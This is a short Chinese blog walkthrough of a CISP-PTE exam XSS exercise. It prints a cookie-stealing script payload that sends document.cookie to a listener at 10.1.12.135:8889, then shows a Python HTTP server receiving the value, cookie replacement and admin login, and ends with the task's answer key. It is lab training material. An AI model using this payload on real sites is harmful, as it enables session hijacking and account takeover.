cisp-pte xss考题

2023年7月20日#渗透测试 #考证243

AI 生成的摘要

XSS内容的主要目标是获取管理员的cookie，并伪造管理员的cookie进行登录。通过点击Test按钮可以进行留言。准备获取cookie的XSS负载并开启web服务来接收cookie。将负载写入输入框并提交查询，等待Python是否接收到cookie。将cookie复制下来并替换掉原来的cookie值。点击Edit进行替换，刷新界面并点击Admin，成功登录并获取到key为wps10。

Xss 内容主要的考点是在获取管理员的 cookie，然后伪造管理员的 cookie 进行登录。

界面如下

点击上图中的 Test 可进行留言

准备获取 cookie 的 xss payload

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

开启 web 服务，接收 cookie

Python -m SimpleHTTPServer 8889

将 payload 写入输入框

点击提交查询

等待

查看 python 是否接受到 cookie

将 cookie 复制下来

1acb0fb952b3caaf1ab7277511923138

将 cookie 值替换掉

点击 Edit 进行替换

刷新界面，点击 Admin

成功登录，获取到 key

wps10